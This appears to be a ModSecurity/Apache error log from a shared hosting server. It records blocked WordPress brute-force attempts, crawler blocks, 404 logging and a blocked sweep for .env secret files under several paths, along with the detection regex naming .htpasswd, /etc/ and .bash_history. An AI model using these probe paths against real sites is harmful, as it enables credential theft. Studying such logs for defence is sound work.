[Tue May 26 17:39:22.152877 2026] [security2:error] [pid 912729:tid 912750] [remote 5.250.187.247:37868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWNcUoCupl_NMj3qz-LFgAAkBQ"]
[Tue May 26 17:39:22.612815 2026] [security2:error] [pid 912729:tid 912923] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNckoCupl_NMj3qz-LJAAAAMM"]
[Tue May 26 17:39:24.111712 2026] [security2:error] [pid 912729:tid 912920] [client 181.62.52.20:4016] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "ecosol.plus"] [uri "/esplus/procesar_login.php"] [unique_id "ahWNc0oCupl_NMj3qz-LaQAAwCc"], referer: https://ecosol.plus/esplus/login.php
[Tue May 26 17:39:24.949800 2026] [security2:error] [pid 912729:tid 912780] [remote 74.7.241.58:52462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWNdEoCupl_NMj3qz-LxwAA_DI"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 17:39:25.363319 2026] [security2:error] [pid 912729:tid 912938] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNdEoCupl_NMj3qz-LxAAAANI"]
[Tue May 26 17:39:27.378149 2026] [security2:error] [pid 912729:tid 912971] [client 171.25.193.131:33476] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "kingsclubmembership.com"] [uri "/wp-content/plugins/jetpack/readme.txt"] [unique_id "ahWNd0oCupl_NMj3qz-MTwAAAPM"]
[Tue May 26 17:39:27.397981 2026] [security2:error] [pid 912729:tid 912965] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNdkoCupl_NMj3qz-MNgAAAO0"]
[Tue May 26 17:39:28.163161 2026] [security2:error] [pid 912729:tid 912910] [client 114.119.146.158:48585] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "osmsi.org.in"] [uri "/osmsi-conclaves.php"] [unique_id "ahWNeEoCupl_NMj3qz-MdwAAALY"], referer: http://osmsi.org.in/
[Tue May 26 17:39:28.754500 2026] [security2:error] [pid 912729:tid 912878] [client 223.235.98.214:26924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNeEoCupl_NMj3qz-MjQAAAJg"]
[Tue May 26 17:39:28.754638 2026] [security2:error] [pid 912729:tid 912878] [client 223.235.98.214:26924] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNeEoCupl_NMj3qz-MjQAAAJg"]
[Tue May 26 17:39:29.971126 2026] [security2:error] [pid 912729:tid 912901] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNeUoCupl_NMj3qz-MwQAAAK0"]
[Tue May 26 17:39:30.507326 2026] [security2:error] [pid 912729:tid 912898] [client 114.119.133.46:64425] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "worldwidecourier.co.in"] [uri "/tag/ocean"] [unique_id "ahWNekoCupl_NMj3qz-M-QAAAKo"], referer: https://worldwidecourier.co.in/tag/ocean
[Tue May 26 17:39:32.412399 2026] [security2:error] [pid 912729:tid 912972] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNe0oCupl_NMj3qz-NZgAAAPQ"]
[Tue May 26 17:39:32.414162 2026] [security2:error] [pid 912729:tid 912884] [client 85.208.96.211:48052] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahWNfEoCupl_NMj3qz-NgwAAAJ4"]
[Tue May 26 17:39:32.414291 2026] [security2:error] [pid 912729:tid 912884] [client 85.208.96.211:48052] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahWNfEoCupl_NMj3qz-NgwAAAJ4"]
[Tue May 26 17:39:34.728048 2026] [security2:error] [pid 912729:tid 912898] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNfkoCupl_NMj3qz-N8wAAAKo"]
[Tue May 26 17:39:36.046335 2026] [core:error] [pid 912729:tid 912900] [client 64.64.127.37:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:39:36.046354 2026] [core:error] [pid 912729:tid 912900] [client 64.64.127.37:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:39:36.169914 2026] [core:error] [pid 912729:tid 912894] [client 64.64.127.45:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:39:36.169934 2026] [core:error] [pid 912729:tid 912894] [client 64.64.127.45:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:39:37.417553 2026] [security2:error] [pid 912729:tid 912988] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNgEoCupl_NMj3qz-OpAAAAQQ"]
[Tue May 26 17:39:38.823047 2026] [security2:error] [pid 912729:tid 912861] [client 85.208.96.201:42514] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cagmedya.com"] [uri "/login"] [unique_id "ahWNgkoCupl_NMj3qz-PFwAAAIc"]
[Tue May 26 17:39:38.823164 2026] [security2:error] [pid 912729:tid 912861] [client 85.208.96.201:42514] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cagmedya.com"] [uri "/login"] [unique_id "ahWNgkoCupl_NMj3qz-PFwAAAIc"]
[Tue May 26 17:39:39.226474 2026] [security2:error] [pid 912729:tid 912951] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNgkoCupl_NMj3qz-PFAAAAN8"]
[Tue May 26 17:39:39.482576 2026] [security2:error] [pid 912729:tid 912931] [client 223.235.98.214:8155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNg0oCupl_NMj3qz-POwAAAMs"]
[Tue May 26 17:39:39.482808 2026] [security2:error] [pid 912729:tid 912931] [client 223.235.98.214:8155] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNg0oCupl_NMj3qz-POwAAAMs"]
[Tue May 26 17:39:41.533493 2026] [security2:error] [pid 912729:tid 912953] [client 103.99.37.229:45798] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wrapmachines.com"] [uri "/api/.env"] [unique_id "ahWNhUoCupl_NMj3qz-PuAAAAOE"]
[Tue May 26 17:39:41.540645 2026] [security2:error] [pid 912729:tid 912954] [client 103.99.37.229:45834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wrapmachines.com"] [uri "/app/.env"] [unique_id "ahWNhUoCupl_NMj3qz-PuQAAAOI"]
[Tue May 26 17:39:41.554961 2026] [security2:error] [pid 912729:tid 912934] [client 103.99.37.229:45810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wrapmachines.com"] [uri "/.env"] [unique_id "ahWNhUoCupl_NMj3qz-PugAAAM4"]
[Tue May 26 17:39:41.585024 2026] [security2:error] [pid 912729:tid 912988] [client 103.99.37.229:45820] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wrapmachines.com"] [uri "/public/.env"] [unique_id "ahWNhUoCupl_NMj3qz-PuwAAAQQ"]
[Tue May 26 17:39:41.587264 2026] [security2:error] [pid 912729:tid 912916] [client 103.99.37.229:45792] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wrapmachines.com"] [uri "/storage/.env"] [unique_id "ahWNhUoCupl_NMj3qz-PvQAAALw"]
[Tue May 26 17:39:41.592869 2026] [security2:error] [pid 912729:tid 912959] [client 103.99.37.229:45850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wrapmachines.com"] [uri "/www/.env"] [unique_id "ahWNhUoCupl_NMj3qz-PvwAAAOc"]
[Tue May 26 17:39:41.594383 2026] [security2:error] [pid 912729:tid 912914] [client 103.99.37.229:45824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wrapmachines.com"] [uri "/backend/.env"] [unique_id "ahWNhUoCupl_NMj3qz-PwAAAALo"]
[Tue May 26 17:39:41.726880 2026] [security2:error] [pid 912729:tid 912861] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNhUoCupl_NMj3qz-PpQAAAIc"]
[Tue May 26 17:39:42.017151 2026] [security2:error] [pid 912729:tid 912864] [client 51.75.236.147:15380] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.shirdisaibabatemple.org"] [uri "/robots.txt"] [unique_id "ahWNhkoCupl_NMj3qz-P2QAAAIo"]
[Tue May 26 17:39:42.017281 2026] [security2:error] [pid 912729:tid 912864] [client 51.75.236.147:15380] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.shirdisaibabatemple.org"] [uri "/robots.txt"] [unique_id "ahWNhkoCupl_NMj3qz-P2QAAAIo"]
[Tue May 26 17:39:42.812281 2026] [security2:error] [pid 912729:tid 912835] [remote 172.104.164.56:54672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWNhkoCupl_NMj3qz-P_QAAr2k"]
[Tue May 26 17:39:42.932525 2026] [security2:error] [pid 912729:tid 912928] [client 114.119.142.132:33557] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahWNhkoCupl_NMj3qz-QDgAAAMg"]
[Tue May 26 17:39:43.106301 2026] [security2:error] [pid 912729:tid 912924] [client 92.222.104.215:29826] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "poonawallatennisacademy.com"] [uri "/robots.txt"] [unique_id "ahWNh0oCupl_NMj3qz-QGAAAAMQ"]
[Tue May 26 17:39:43.106404 2026] [security2:error] [pid 912729:tid 912924] [client 92.222.104.215:29826] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "poonawallatennisacademy.com"] [uri "/robots.txt"] [unique_id "ahWNh0oCupl_NMj3qz-QGAAAAMQ"]
[Tue May 26 17:39:43.649022 2026] [security2:error] [pid 912729:tid 912954] [client 142.44.220.67:41992] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.shirdisaibabatemple.org"] [uri "/"] [unique_id "ahWNh0oCupl_NMj3qz-QOAAAAOI"]
[Tue May 26 17:39:43.649126 2026] [security2:error] [pid 912729:tid 912954] [client 142.44.220.67:41992] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.shirdisaibabatemple.org"] [uri "/"] [unique_id "ahWNh0oCupl_NMj3qz-QOAAAAOI"]
[Tue May 26 17:39:44.209872 2026] [security2:error] [pid 912729:tid 912886] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNh0oCupl_NMj3qz-QRAAAAKA"]
[Tue May 26 17:39:44.453849 2026] [security2:error] [pid 912729:tid 912919] [client 142.44.220.131:49260] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "poonawallatennisacademy.com"] [uri "/"] [unique_id "ahWNiEoCupl_NMj3qz-QcwAAAL8"]
[Tue May 26 17:39:44.454025 2026] [security2:error] [pid 912729:tid 912919] [client 142.44.220.131:49260] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "poonawallatennisacademy.com"] [uri "/"] [unique_id "ahWNiEoCupl_NMj3qz-QcwAAAL8"]
[Tue May 26 17:39:45.715890 2026] [security2:error] [pid 912729:tid 912924] [client 103.99.37.229:55614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWNh0oCupl_NMj3qz-QGQAAAPk"]
[Tue May 26 17:39:46.141144 2026] [security2:error] [pid 912729:tid 912947] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNiUoCupl_NMj3qz-QxwAAANs"]
[Tue May 26 17:39:46.412001 2026] [security2:error] [pid 912729:tid 912966] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNikoCupl_NMj3qz-Q7wAAAO4"], referer: https://www.anujtradingco.com/
[Tue May 26 17:39:46.990796 2026] [security2:error] [pid 912729:tid 912977] [client 114.119.130.251:47491] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/maps.googleapis.com"] [unique_id "ahWNikoCupl_NMj3qz-RFAAAAPk"], referer: https://moes-art.com//maps.googleapis.com
[Tue May 26 17:39:47.170877 2026] [security2:error] [pid 912729:tid 912902] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNi0oCupl_NMj3qz-RHgAAAK4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 17:39:47.291424 2026] [security2:error] [pid 912729:tid 912770] [remote 35.233.46.64:32084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 64.46.233.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWNi0oCupl_NMj3qz-RHwAAtSg"]
[Tue May 26 17:39:47.748297 2026] [security2:error] [pid 912729:tid 912788] [remote 211.23.68.235:10350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWNi0oCupl_NMj3qz-ROQAA9zo"]
[Tue May 26 17:39:48.732922 2026] [security2:error] [pid 912729:tid 912890] [client 176.31.139.15:39450] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.siliconelevators.in"] [uri "/robots.txt"] [unique_id "ahWNjEoCupl_NMj3qz-RggAAAKM"]
[Tue May 26 17:39:48.733030 2026] [security2:error] [pid 912729:tid 912890] [client 176.31.139.15:39450] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.siliconelevators.in"] [uri "/robots.txt"] [unique_id "ahWNjEoCupl_NMj3qz-RggAAAKM"]
[Tue May 26 17:39:48.752052 2026] [security2:error] [pid 912729:tid 912886] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNjEoCupl_NMj3qz-RaQAAAKA"]
[Tue May 26 17:39:48.929361 2026] [security2:error] [pid 912729:tid 912955] [client 205.210.31.82:58804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWNhkoCupl_NMj3qz-QBwAAAOM"]
